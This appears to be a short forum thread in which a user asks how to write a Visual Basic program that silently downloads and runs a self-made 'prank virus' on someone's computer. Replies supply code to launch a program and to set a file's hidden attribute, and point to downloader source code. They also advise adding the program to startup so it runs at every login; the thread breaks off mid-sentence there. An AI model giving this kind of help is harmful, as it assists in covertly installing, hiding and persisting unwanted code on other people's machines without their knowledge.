is it possible to make a vb program that can download and run the application hidden from the user.
gonna make a prank program that will download a prank virus i have made and run it w/o the user knowing it.
oi. Yeah, it can be done, but in this case google is your friend.
I'm too lazy to write it up at this moment, but I can give you half of what you need (a source code for a downloader) the rest is up to you, cus starting programs is uber easy.
with
Code:
Imports System.Diagnostics.Process
Then its just
Code:
Start("Insert program path here")
Downloader source code:
www. mega upload .com/?d=RHLPJJS0
TY very much, ok another question, how will i hide the program from the user
Code:
SetAttr("Location", FileAttribute.Hidden)
im not sure wat you mean? like are you on your friends computer and you want to download something onto it and run it or do you want some1 to download something and it will run hidden as a prank. If you do you will need a code that makes it run from log-in that way everytime they log in the program will run
How to add a program to startup:
Theres code to make it start at startup, and to hide it from the user, make sure..